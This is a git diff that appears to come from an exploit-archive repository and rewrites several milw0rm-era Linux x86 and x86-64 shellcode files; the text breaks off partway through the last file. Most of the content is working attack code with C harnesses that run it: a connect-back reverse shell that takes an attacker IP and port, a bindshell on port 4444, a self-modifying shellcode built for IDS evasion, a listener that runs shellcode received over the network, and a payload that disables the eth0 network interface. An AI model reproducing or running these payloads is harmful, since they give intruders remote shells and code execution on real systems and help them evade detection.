@@ -1,125 +1,125 @@ -#include -#include -#include -#include -#include -#include -#include - - -/* - - usual rant here.. this is just a doodle.. i was curious about - the amd64 and since i dont think a simple exec /bin/sh is worth releasing - - i give you, my amd64 connect-back semi-stealth shellcode.. i say semi-stelth - because it contains the bullshit feature that /bin/bash isnt /easily/ noticable - - this code uses both 32 and 64 bit instructions, and uses only 64 bit kernel entrypoints - - if you might say "but..phar.. linux has 32 bit compatability.. and i can just use existing shellcode" - - to that my answer is "fuck you".. i mean.. "there is actually an option to disable 32bit compatability.. - i checked.. its there... i promise" - - im not entirely sure the C crap below will do what you want.. but the shellcode is good and can be edited - by hand if needed.. (dont forget to invert) - - bpp.etherdyne.net - www.stonedcoder.org - phar[at]stonedcoder[dot]org - -*/ - -char sc_raw[] = -"\x48\x31\xd2" // xor %rdx,%rdx -"\x6a\x01" // pushq $0x1 -"\x5e" // pop %rsi -"\x6a\x02" // pushq $0x2 -"\x5f" // pop %rdi -"\x6a\x29" // pushq $0x29 -"\x58" // pop %rax -"\x0f\x05" // syscall #socket - -"\x48\x97" // xchg %rax,%rdi #in_sockaddr, rax does equal 2 but i think i can get away with this -"\x50" // push %rax -"\x48\xb9\x00\x00\x00\x00\x11" // mov $0x4141414141414141,%rcx -"\x11\xff\xfd" -"\x48\xf7\xd1" // not %rcx -"\x51" // push %rcx -"\x48\x89\xe6" // mov %rsp,%rsi -"\x6a\x10" // pushq $0x10 -"\x5a" // pop %rdx -"\x6a\x2a" // pushq $0x2a -"\x58" // pop %rax -"\x0f\x05" // syscall #connect - -"\x6a\x03" // pushq $0x3 -"\x5e" // pop %rsi -//dup_loop: -"\x6a\x21" // pushq $0x21 -"\x58" // pop %rax -"\x48\xff\xce" // dec %rsi -"\x0f\x05" // syscall #dup2 - - -"\x75\xf6" // jne 4004c5 -"\x48\xbb\xd0\x9d\x96\x91\xd0" // mov $0xff978cd091969dd0,%rbx -"\x8c\x97\xff" -"\x48\xf7\xd3" // not %rbx -"\x53" // push %rbx -"\x48\x89\xe7" // mov %rsp,%rdi -"\x48\x31\xc0" // xor 
%rax,%rax -"\x50" // push %rax -"\x57" // push %rdi -"\x48\x89\xe6" // mov %rsp,%rsi -"\x48\x31\xd2" // xor %rdx,%rdx -"\xb0\x3b" // mov $0x3b,%al -"\x0f\x05" // syscall #exec -; - -#define HOSTOFFSET 19 -#define PORTOFFSET 23 - -void scprint(char * foo, int len); -void usage(); - -void (*shellcode)() = sc_raw; - -main(int argc, char *argv[]){ -uint32 host; -uint16 port; - - - if(argc != 3){ //i'll only do so much to save you from stupidity - usage(); - exit(1); - } - - host =~ (int)inet_addr(argv[1]); - - port =~ htons(atoi(argv[2])); - - memcpy(&sc_raw[HOSTOFFSET],&host,4); - memcpy(&sc_raw[PORTOFFSET],&port,2); - scprint(sc_raw,sizeof(sc_raw)); - shellcode(); -} - - -void scprint(char * foo, int len){ -int i; - - printf("char shellcode[]=\""); - for(i = 0; i < len; i++){ - printf("\\x%02x",(char)foo[i]&0xff); - } - printf("\";\n"); - fflush(stdout); -} - -void usage(){ - printf("./%s [] []\n\n"); -} - +#include +#include +#include +#include +#include +#include +#include + + +/* + + usual rant here.. this is just a doodle.. i was curious about + the amd64 and since i dont think a simple exec /bin/sh is worth releasing + + i give you, my amd64 connect-back semi-stealth shellcode.. i say semi-stelth + because it contains the bullshit feature that /bin/bash isnt /easily/ noticable + + this code uses both 32 and 64 bit instructions, and uses only 64 bit kernel entrypoints + + if you might say "but..phar.. linux has 32 bit compatability.. and i can just use existing shellcode" + + to that my answer is "fuck you".. i mean.. "there is actually an option to disable 32bit compatability.. + i checked.. its there... i promise" + + im not entirely sure the C crap below will do what you want.. but the shellcode is good and can be edited + by hand if needed.. 
(dont forget to invert) + + bpp.etherdyne.net + www.stonedcoder.org + phar[at]stonedcoder[dot]org + +*/ + +char sc_raw[] = +"\x48\x31\xd2" // xor %rdx,%rdx +"\x6a\x01" // pushq $0x1 +"\x5e" // pop %rsi +"\x6a\x02" // pushq $0x2 +"\x5f" // pop %rdi +"\x6a\x29" // pushq $0x29 +"\x58" // pop %rax +"\x0f\x05" // syscall #socket + +"\x48\x97" // xchg %rax,%rdi #in_sockaddr, rax does equal 2 but i think i can get away with this +"\x50" // push %rax +"\x48\xb9\x00\x00\x00\x00\x11" // mov $0x4141414141414141,%rcx +"\x11\xff\xfd" +"\x48\xf7\xd1" // not %rcx +"\x51" // push %rcx +"\x48\x89\xe6" // mov %rsp,%rsi +"\x6a\x10" // pushq $0x10 +"\x5a" // pop %rdx +"\x6a\x2a" // pushq $0x2a +"\x58" // pop %rax +"\x0f\x05" // syscall #connect + +"\x6a\x03" // pushq $0x3 +"\x5e" // pop %rsi +//dup_loop: +"\x6a\x21" // pushq $0x21 +"\x58" // pop %rax +"\x48\xff\xce" // dec %rsi +"\x0f\x05" // syscall #dup2 + + +"\x75\xf6" // jne 4004c5 +"\x48\xbb\xd0\x9d\x96\x91\xd0" // mov $0xff978cd091969dd0,%rbx +"\x8c\x97\xff" +"\x48\xf7\xd3" // not %rbx +"\x53" // push %rbx +"\x48\x89\xe7" // mov %rsp,%rdi +"\x48\x31\xc0" // xor %rax,%rax +"\x50" // push %rax +"\x57" // push %rdi +"\x48\x89\xe6" // mov %rsp,%rsi +"\x48\x31\xd2" // xor %rdx,%rdx +"\xb0\x3b" // mov $0x3b,%al +"\x0f\x05" // syscall #exec +; + +#define HOSTOFFSET 19 +#define PORTOFFSET 23 + +void scprint(char * foo, int len); +void usage(); + +void (*shellcode)() = sc_raw; + +main(int argc, char *argv[]){ +uint32 host; +uint16 port; + + + if(argc != 3){ //i'll only do so much to save you from stupidity + usage(); + exit(1); + } + + host =~ (int)inet_addr(argv[1]); + + port =~ htons(atoi(argv[2])); + + memcpy(&sc_raw[HOSTOFFSET],&host,4); + memcpy(&sc_raw[PORTOFFSET],&port,2); + scprint(sc_raw,sizeof(sc_raw)); + shellcode(); +} + + +void scprint(char * foo, int len){ +int i; + + printf("char shellcode[]=\""); + for(i = 0; i < len; i++){ + printf("\\x%02x",(char)foo[i]&0xff); + } + printf("\";\n"); + fflush(stdout); +} + +void usage(){ 
+ printf("./%s [] []\n\n"); +} + // milw0rm.com [2006-04-21] \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/13463.c b/platforms/lin_x86-64/shellcode/13463.c index d5154242b..d35aa04ff 100755 --- a/platforms/lin_x86-64/shellcode/13463.c +++ b/platforms/lin_x86-64/shellcode/13463.c 
@@ -1,90 +1,89 @@ - -/* -linux/x86-64 bindshell(port 4444) -xi4oyu [at] 80sec.com -http://www.80sec.com - - -BITS 64 -xor eax,eax -xor ebx,ebx -xor edx,edx -;socket -mov al,0x1 -mov esi,eax -inc al -mov edi,eax -mov dl,0x6 -mov al,0x29 -syscall -xchg ebx,eax ;store the server sock -;bind -xor rax,rax -push rax -push 0x5c110102 -mov [rsp+1],al -mov rsi,rsp -mov dl,0x10 -mov edi,ebx -mov al,0x31 -syscall -;listen -mov al,0x5 -mov esi,eax -mov edi,ebx -mov al,0x32 -syscall -;accept -xor edx,edx -xor esi,esi -mov edi,ebx -mov al,0x2b -syscall -mov edi,eax ; store sock -;dup2 -xor rax,rax -mov esi,eax -mov al,0x21 -syscall -inc al -mov esi,eax -mov al,0x21 -syscall -inc al -mov esi,eax -mov al,0x21 -syscall -;exec -xor rdx,rdx -mov rbx,0x68732f6e69622fff -shr rbx,0x8 -push rbx -mov rdi,rsp -xor rax,rax -push rax -push rdi -mov rsi,rsp -mov al,0x3b -syscall -push rax -pop rdi -mov al,0x3c -syscall -*/ - -main() { - char shellcode[] = - "\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2" - "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c" - "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05" - "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89" - "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f" - "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" - "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" - "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" - "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"; - - (*(void (*)()) shellcode)(); -} - +/* +linux/x86-64 bindshell(port 4444) +xi4oyu [at] 80sec.com +http://www.80sec.com + + +BITS 64 +xor eax,eax +xor ebx,ebx +xor edx,edx +;socket +mov al,0x1 +mov esi,eax +inc al +mov edi,eax +mov dl,0x6 +mov al,0x29 +syscall +xchg ebx,eax ;store the server sock +;bind +xor rax,rax +push rax +push 0x5c110102 +mov [rsp+1],al +mov rsi,rsp +mov dl,0x10 +mov edi,ebx +mov al,0x31 +syscall +;listen +mov al,0x5 +mov esi,eax +mov edi,ebx +mov al,0x32 
+syscall +;accept +xor edx,edx +xor esi,esi +mov edi,ebx +mov al,0x2b +syscall +mov edi,eax ; store sock +;dup2 +xor rax,rax +mov esi,eax +mov al,0x21 +syscall +inc al +mov esi,eax +mov al,0x21 +syscall +inc al +mov esi,eax +mov al,0x21 +syscall +;exec +xor rdx,rdx +mov rbx,0x68732f6e69622fff +shr rbx,0x8 +push rbx +mov rdi,rsp +xor rax,rax +push rax +push rdi +mov rsi,rsp +mov al,0x3b +syscall +push rax +pop rdi +mov al,0x3c +syscall +*/ + +main() { + char shellcode[] = + "\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2" + "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c" + "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05" + "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89" + "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f" + "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" + "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" + "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2009-05-18] \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/13464.s b/platforms/lin_x86-64/shellcode/13464.s index 8526526fe..411555859 100755 --- a/platforms/lin_x86-64/shellcode/13464.s +++ b/platforms/lin_x86-64/shellcode/13464.s 
@@ -1,29 +1,29 @@ -# [Linux/X86-64] -# Dummy for shellcode: -# execve("/bin/sh", ["/bin/sh"], NULL) -# hophet [at] gmail.com - -.text - .globl _start -_start: - - xorq %rdx, %rdx - movq $0x68732f6e69622fff,%rbx - shr $0x8, %rbx - push %rbx - movq %rsp,%rdi - xorq %rax,%rax - pushq %rax - pushq %rdi - movq %rsp,%rsi - mov $0x3b,%al # execve(3b) - syscall - - pushq $0x1 - pop %rdi - pushq $0x3c # exit(3c) - pop %rax - syscall - - +# [Linux/X86-64] +# Dummy for shellcode: +# execve("/bin/sh", ["/bin/sh"], NULL) +# hophet [at] gmail.com + +.text + .globl _start +_start: + + xorq %rdx, %rdx + movq $0x68732f6e69622fff,%rbx + shr $0x8, %rbx + push %rbx + movq %rsp,%rdi + xorq %rax,%rax + pushq %rax + pushq %rdi + movq %rsp,%rsi + mov $0x3b,%al # execve(3b) + syscall + + pushq $0x1 + pop %rdi + pushq $0x3c # exit(3c) + pop %rax + syscall + + # milw0rm.com [2006-11-02] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13307.c b/platforms/lin_x86/shellcode/13307.c index 8cf321e4c..bfa612508 100755 --- a/platforms/lin_x86/shellcode/13307.c +++ b/platforms/lin_x86/shellcode/13307.c 
@@ -1,72 +1,72 @@ -/* - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta\x40phreaker\x2enet - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - Description: - linux/x86 Self-modifying ShellCode for IDS evasion - creates int $0x80 syscalls on runtime. - - OS: Linux - Arch: x86 - Length: 64 bytes ( 35 without /bin/sh payload ) - Author: XenoMuta - - hola at: - str0k3, garay, fr1t0l4y, emra. - - God bless you all - - -=== SOURCE CODE ==== -.globl _start -_start: - jmp _findOut -_WhereAmI: - pop %edx // Save our payload's address g20 - mov %edx, %esi // and save it 4 later -_loopMakeInt80s: - mov (%edx), %eax - cmpw $0x7dca, %ax // Find this guy ( 0x7dca ) and - jne _no - addw $0x303, %ax // 0x7dca + 0x303 == 0x80cd ( int $0x80 ) - mov %eax, (%edx) -_no: - incb %dl - cmp $0x41414141, %eax // Use 'AAAA' as end Marker. - jne _loopMakeInt80s - jmp *%esi // Jump to our converted code when done -_findOut: - call _WhereAmI -_payload: // Paste your shell code here and then replace - xor %edx, %edx // "\xcd\x80" (int $0x80) for .ascii "\xca7d" - push $0xb // and end with .ascii "AAAA" as end marker - pop %eax - cltd - push %edx - push $0x68732f2f - push $0x6e69622f - mov %esp, %ebx - push %edx - push %ebx - mov %esp,%ecx - .ascii "\xca\x7d" // + 0x303 = 0xcd80 (int $0x80) - .ascii "AAAA" -=== SOURCE CODE ==== -*/ - - -char shellcode[] = "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41"; - -int main () -{ - printf("Length: %d bytes\n", strlen(shellcode)); - int (*sc)() = (int (*)())shellcode; - sc(); - return 0; -} - +/* + _ __ __ ___ __ + | |/ /__ ____ ____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / 
/ / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta\x40phreaker\x2enet + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + Description: + linux/x86 Self-modifying ShellCode for IDS evasion + creates int $0x80 syscalls on runtime. + + OS: Linux + Arch: x86 + Length: 64 bytes ( 35 without /bin/sh payload ) + Author: XenoMuta + + hola at: + str0k3, garay, fr1t0l4y, emra. + - God bless you all - + +=== SOURCE CODE ==== +.globl _start +_start: + jmp _findOut +_WhereAmI: + pop %edx // Save our payload's address g20 + mov %edx, %esi // and save it 4 later +_loopMakeInt80s: + mov (%edx), %eax + cmpw $0x7dca, %ax // Find this guy ( 0x7dca ) and + jne _no + addw $0x303, %ax // 0x7dca + 0x303 == 0x80cd ( int $0x80 ) + mov %eax, (%edx) +_no: + incb %dl + cmp $0x41414141, %eax // Use 'AAAA' as end Marker. + jne _loopMakeInt80s + jmp *%esi // Jump to our converted code when done +_findOut: + call _WhereAmI +_payload: // Paste your shell code here and then replace + xor %edx, %edx // "\xcd\x80" (int $0x80) for .ascii "\xca7d" + push $0xb // and end with .ascii "AAAA" as end marker + pop %eax + cltd + push %edx + push $0x68732f2f + push $0x6e69622f + mov %esp, %ebx + push %edx + push %ebx + mov %esp,%ecx + .ascii "\xca\x7d" // + 0x303 = 0xcd80 (int $0x80) + .ascii "AAAA" +=== SOURCE CODE ==== +*/ + + +char shellcode[] = "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41"; + +int main () +{ + printf("Length: %d bytes\n", strlen(shellcode)); + int (*sc)() = (int (*)())shellcode; + sc(); + return 0; +} + // milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13308.c b/platforms/lin_x86/shellcode/13308.c index 70288eab6..c136b7bc4 100755 
--- a/platforms/lin_x86/shellcode/13308.c +++ b/platforms/lin_x86/shellcode/13308.c @@ -1,126 +1,126 @@ -/* - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta\x40phreaker\x2enet - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - Description: - a linux/x86 shellcode that forks a HTTP Server on port tcp/8800 - - OS: Linux - Arch: x86 - Length: 166 bytes - Author: XenoMuta - - hola at: - str0k3, garay, fr1t0l4y, emra. - - God bless you all - - -==== SOURCE CODE ==== -.globl _start -_start: - xor %eax, %eax - mov $0x02, %al - int $0x80 - test %eax, %eax - jz socket - xor %eax, %eax - incb %al - int $0x80 -txt: - pop %ecx - movb $27, %dl - int $0x80 - -close: - movb $0x6, %al - mov %esi, %ebx - int $0x80 - -exit: - mov $0x01, %al - xor %ebx, %ebx - int $0x80 - -socketcall: - pop %esi - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - jmp *%esi - -socket: - cltd - xor %eax, %eax - xor %ebx, %ebx - push $0x6 - push $0x1 - push $0x2 - call socketcall - -bind: - mov %eax, %edi - xor %edx, %edx - push %edx - pushw $0x6022 - pushw %bx - mov %esp, %ecx - push $0x10 - push %ecx - push %edi - call socketcall - -listen: - inc %bl - push $0x05 - push %edi - call socketcall - -accept: - xor %ecx, %ecx - push %edx - push %edx - push %edi - call socketcall - -fork: - mov %eax, %esi - xor %eax, %eax - mov $0x02, %al - int $0x80 - test %eax, %eax - jz write - - xor %eax, %eax - mov $0x06, %al - mov %esi, %ebx - int $0x80 - - xor %eax, %eax - xor %ebx, %ebx - mov $0x04, %bl - jmp accept - -write: - mov %esi, %ebx - mov $0x04, %al - call txt - .string "HTTP/1.0 200\r\n\r\n

:)

" -==== SOURCE CODE ==== -*/ -char shellcode[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74\x22\x31\xc0\xfe\xc0\xcd\x80\x59\xb2\x1b\xcd\x80\xb0\x06\x89\xf3\xcd\x80\xb0\x01\x31\xdb\xcd\x80\x5e\xb0\x66\xfe\xc3\x89\xe1\xcd\x80\xff\xe6\x99\x31\xc0\x31\xdb\x6a\x06\x6a\x01\x6a\x02\xe8\xe5\xff\xff\xff\x89\xc7\x31\xd2\x52\x66\x68\x22\x60\x66\x53\x89\xe1\x6a\x10\x51\x57\xe8\xcf\xff\xff\xff\xfe\xc3\x6a\x05\x57\xe8\xc5\xff\xff\xff\x31\xc9\x52\x52\x57\xe8\xbb\xff\xff\xff\x89\xc6\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74\x10\x31\xc0\xb0\x06\x89\xf3\xcd\x80\x31\xc0\x31\xdb\xb3\x04\xeb\xda\x89\xf3\xb0\x04\xe8\x85\xff\xff\xff\x48\x54\x54\x50\x2f\x31\x2e\x30\x20\x32\x30\x30\x0d\x0a\x0d\x0a\x3c\x68\x31\x3e\x3a\x29\x3c\x2f\x68\x31\x3e"; - -int main () -{ - printf("Length: %d bytes\n", strlen(shellcode)); - int (*sc)() = (int (*)())shellcode; - sc(); - return 0; -} - +/* + _ __ __ ___ __ + | |/ /__ ____ ____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta\x40phreaker\x2enet + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + Description: + a linux/x86 shellcode that forks a HTTP Server on port tcp/8800 + + OS: Linux + Arch: x86 + Length: 166 bytes + Author: XenoMuta + + hola at: + str0k3, garay, fr1t0l4y, emra. 
+ - God bless you all - + +==== SOURCE CODE ==== +.globl _start +_start: + xor %eax, %eax + mov $0x02, %al + int $0x80 + test %eax, %eax + jz socket + xor %eax, %eax + incb %al + int $0x80 +txt: + pop %ecx + movb $27, %dl + int $0x80 + +close: + movb $0x6, %al + mov %esi, %ebx + int $0x80 + +exit: + mov $0x01, %al + xor %ebx, %ebx + int $0x80 + +socketcall: + pop %esi + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + jmp *%esi + +socket: + cltd + xor %eax, %eax + xor %ebx, %ebx + push $0x6 + push $0x1 + push $0x2 + call socketcall + +bind: + mov %eax, %edi + xor %edx, %edx + push %edx + pushw $0x6022 + pushw %bx + mov %esp, %ecx + push $0x10 + push %ecx + push %edi + call socketcall + +listen: + inc %bl + push $0x05 + push %edi + call socketcall + +accept: + xor %ecx, %ecx + push %edx + push %edx + push %edi + call socketcall + +fork: + mov %eax, %esi + xor %eax, %eax + mov $0x02, %al + int $0x80 + test %eax, %eax + jz write + + xor %eax, %eax + mov $0x06, %al + mov %esi, %ebx + int $0x80 + + xor %eax, %eax + xor %ebx, %ebx + mov $0x04, %bl + jmp accept + +write: + mov %esi, %ebx + mov $0x04, %al + call txt + .string "HTTP/1.0 200\r\n\r\n

:)

" +==== SOURCE CODE ==== +*/ +char shellcode[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74\x22\x31\xc0\xfe\xc0\xcd\x80\x59\xb2\x1b\xcd\x80\xb0\x06\x89\xf3\xcd\x80\xb0\x01\x31\xdb\xcd\x80\x5e\xb0\x66\xfe\xc3\x89\xe1\xcd\x80\xff\xe6\x99\x31\xc0\x31\xdb\x6a\x06\x6a\x01\x6a\x02\xe8\xe5\xff\xff\xff\x89\xc7\x31\xd2\x52\x66\x68\x22\x60\x66\x53\x89\xe1\x6a\x10\x51\x57\xe8\xcf\xff\xff\xff\xfe\xc3\x6a\x05\x57\xe8\xc5\xff\xff\xff\x31\xc9\x52\x52\x57\xe8\xbb\xff\xff\xff\x89\xc6\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74\x10\x31\xc0\xb0\x06\x89\xf3\xcd\x80\x31\xc0\x31\xdb\xb3\x04\xeb\xda\x89\xf3\xb0\x04\xe8\x85\xff\xff\xff\x48\x54\x54\x50\x2f\x31\x2e\x30\x20\x32\x30\x30\x0d\x0a\x0d\x0a\x3c\x68\x31\x3e\x3a\x29\x3c\x2f\x68\x31\x3e"; + +int main () +{ + printf("Length: %d bytes\n", strlen(shellcode)); + int (*sc)() = (int (*)())shellcode; + sc(); + return 0; +} + // milw0rm.com [2009-09-15] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13309.asm b/platforms/lin_x86/shellcode/13309.asm index 6b6c05a97..bf3835777 100755 --- a/platforms/lin_x86/shellcode/13309.asm +++ b/platforms/lin_x86/shellcode/13309.asm 
@@ -1,80 +1,80 @@ -/* - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta\x40phreaker\x2enet - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - Description: - linux/x86 listens for shellcode on tcp/5555 and jumps to it - OS: Linux - Arch: x86 - Length: 83 bytes - Author: XenoMuta - - greetz to: - str0k3 (tnx for your effort), emra (fragancia), - fr1t0l4y (dejate ver), garay (no me olvido de los pobres ;p ) - - God bless you all - -*/ -.global _start - -_start: - xor %ebx, %ebx - mov %ebx, %eax - -_socket: - push $0x6 - push $0x1 - push $0x2 - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - -_bind: - mov %eax, %edi - xor %edx, %edx - push %edx - pushw $0xb315 /* 5555 */ - pushw %bx - mov %esp, %ecx - push $0x10 - push %ecx - push %edi - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - -_listen: - incb %bl - push $0x1 - push %edi - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - -_accept: - push %edx - push %edx - push %edi - mov $0x66, %al - incb %bl - mov %esp, %ecx - int $0x80 - mov %eax, %ebx - -_read: - mov $0x3, %al - mov %esp, %ecx - mov $0x7ff, %dx - incb %dl - int $0x80 - jmp *%ecx /* Jump to our shellcode */ - +/* + _ __ __ ___ __ + | |/ /__ ____ ____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta\x40phreaker\x2enet + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + Description: + linux/x86 listens for shellcode on tcp/5555 and jumps to it + OS: Linux + Arch: x86 + Length: 83 bytes + Author: XenoMuta + + greetz to: + str0k3 (tnx for your effort), emra (fragancia), + fr1t0l4y (dejate ver), garay (no me olvido de los pobres ;p ) + - God bless you all - +*/ +.global _start + +_start: + xor %ebx, %ebx + mov %ebx, %eax + +_socket: + push $0x6 + 
push $0x1 + push $0x2 + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + +_bind: + mov %eax, %edi + xor %edx, %edx + push %edx + pushw $0xb315 /* 5555 */ + pushw %bx + mov %esp, %ecx + push $0x10 + push %ecx + push %edi + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + +_listen: + incb %bl + push $0x1 + push %edi + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + +_accept: + push %edx + push %edx + push %edi + mov $0x66, %al + incb %bl + mov %esp, %ecx + int $0x80 + mov %eax, %ebx + +_read: + mov $0x3, %al + mov %esp, %ecx + mov $0x7ff, %dx + incb %dl + int $0x80 + jmp *%ecx /* Jump to our shellcode */ + ; milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13310.c b/platforms/lin_x86/shellcode/13310.c index 90c197a55..f04330e4a 100755 --- a/platforms/lin_x86/shellcode/13310.c +++ b/platforms/lin_x86/shellcode/13310.c 
@@ -1,51 +1,51 @@ -/* Linux x86 - Polymorphic shellcode for disable Network Card (default eth0) - 75 bytes - * Jonathan Salwan < submit [!] shell-storm.org > - * - * ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ ! - * - * - * Disassembly of section .text: - * - * 08048060 <_start>: - * 8048060: 6a 0b push $0xb - * 8048062: 58 pop %eax - * 8048063: 99 cltd - * 8048064: 52 push %edx - * 8048065: 68 64 6f 77 6e push $0x6e776f64 - * 804806a: 89 e6 mov %esp,%esi - * 804806c: 52 push %edx - * 804806d: 68 65 74 68 30 push $0x30687465 < (eth0) you can change it for other Network card - * 8048072: 89 e1 mov %esp,%ecx - * 8048074: 52 push %edx - * 8048075: 68 6e 66 69 67 push $0x6769666e - * 804807a: 68 69 66 63 6f push $0x6f636669 - * 804807f: 68 69 6e 2f 2f push $0x2f2f6e69 - * 8048084: 68 2f 2f 73 62 push $0x62732f2f - * 8048089: 89 e3 mov %esp,%ebx - * 804808b: 52 push %edx - * 804808c: 56 push %esi - * 804808d: 51 push %ecx - * 804808e: 53 push %ebx - * 804808f: 89 e1 mov %esp,%ecx - * 8048091: cd 80 int $0x80 - * - */ - -main() -{ -char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x51\x80" - "\x6c\x0e\xff\x01\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x6b\x0c\x59\x9a\x53\x69\x65\x70" - "\x78\x6f\x8a\xe7\x53\x69\x66\x75" - "\x69\x31\x8a\xe2\x53\x69\x6f\x67" - "\x6a\x68\x69\x6a\x67\x64\x70\x69" - "\x6a\x6f\x30\x30\x69\x30\x30\x74" - "\x63\x8a\xe4\x53\x57\x52\x54\x8a" - "\xe2\xce\x81"; - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); -} - +/* Linux x86 - Polymorphic shellcode for disable Network Card (default eth0) - 75 bytes + * Jonathan Salwan < submit [!] shell-storm.org > + * + * ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ ! 
